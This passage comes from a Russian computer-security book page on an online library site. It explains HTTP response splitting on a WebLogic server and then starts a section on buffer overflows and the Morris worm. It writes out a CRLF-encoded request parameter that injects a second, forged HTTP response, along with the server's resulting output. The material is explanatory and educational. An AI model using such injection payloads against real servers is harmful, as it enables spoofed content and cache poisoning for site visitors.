Защити свой компьютер на 100% от вирусов и хакеров. Олег Михайлович Бойцев. Читать онлайн. Newlib. NEWLIB.NET

Автор: Олег Михайлович Бойцев
Издательство:
Серия:
Жанр произведения: Компьютеры: прочее
Год издания: 2008
isbn: 978-5-388-00347-8
Скачать книгу
2003 12:53:28 GMT

      Location: http://10.1.1.1/by_lang.jsp?lang=English

      Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003

      271009 with

      Content-Type: text/html

      Set-Cookie:

      JSESSIONID=1pMRZOiOQzZiE6Y6iivsREg82pq9Bo1ape7h4YoHZ62RXj

      ApqwBE! – 1251019693; path=/

      Connection: Close

      <html><head><title>302 Moved Temporarily</title></head>

      <body bgcolor="#FFFFFF">

      <p>This document you requested has moved temporarily.</p>

      <p>It's now at <a

      href="httр://10.1.1.1/by_lang.jsp?lang=English">httр://10.1.1.1/by_lang.jsp?lan

      g=English</a>.</p>

      </body></html>

      При анализе ответа видно, что значение параметра lang передается в значении заголовка Location. При реализации атаки злоумышленник посылает в качестве значения lang символы перевода строки, чтобы закрыть ответ сервера и сформировать еще один:

      /redir_lang.jsp?lang=foobar%0d%0aContent-

      Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-

      Type:%20text/html%0d%0aContent-

      Length:%2019%0d%0a%0d%0a<html>Shazam</html>

      При обработке этого запроса сервер передаст следующие данные (листинг 1.10).

      Листинг 1.10. Ответ сервера на измененный злоумышленником запрос пользователя

      HTTP/1.1 302 Moved Temporarily

      Date: Wed, 24 Dec 2003 15:26:41 GMT

      Location: http://10.1.1.1/by_lang.jsp?lang=foobar

      Content-Length: 0

      HTTP/1.1 200 OK

      Content-Type: text/html

      Content-Length: 19

      Shazam</html>

      Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003

      271009 with

      Content-Type: text/html

      Set-Cookie:

      JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST

      9UsS! – 1251019693; path=/

      Эти данные будут обработаны клиентом следующим образом:

      ♦ первый ответ с кодом 302 будет командой перенаправления;

      ♦ второй ответ (код 200) объемом в 19 байт будет считаться содержимым той страницы, на которую происходит перенаправление;

      ♦ остальные данные, согласно спецификации HTTP, игнорируются клиентом. Выполнение кода

      Все серверы используют данные, переданные пользователем при обработке запросов. Часто эти данные используются при составлении команд, применяемых для генерации динамического содержимого. Если при разработке не учитываются требования безопасности, злоумышленник получает возможность модифицировать исполняемые команды. В настоящее время выделяют несколько типов атак, направленных на выполнение кода на веб-сервере.

      Переполнение буфера (Buffer Overflow). Переполнение буфера на сегодняшний день является самой распространенной уязвимостью в области безопасности ПО. Первая атака с применением данной уязвимости использовалась в вирусе-черве Морриса в 1988 году. Червь, созданный студентом Корнельского университета, всего спустя пять часов после активации умудрился инфицировать около 6000 компьютеров – по сегодняшним меркам не очень много, но не будем забывать про год! Среди пострадавших – такие монстры, как Агентство Национальной безопасности и Стратегического авиационного командования США, лаборатории NASA (в частности, в вычислительном центре NASA в Хьюстоне червь попытался взять под контроль систему запуска кораблей многоразового использования Space Shuttle). Помимо прочего, червь успел насытить свои низменные гастрономические пристрастия исследовательским центром ВМС США, Калифорнийским НИИ, крупнейшими университетами страны, а также рядом военных баз, клиник и частных компаний. С тех пор количество способов реализации атак на переполнение буфера только увеличилось.

      Эксплуатация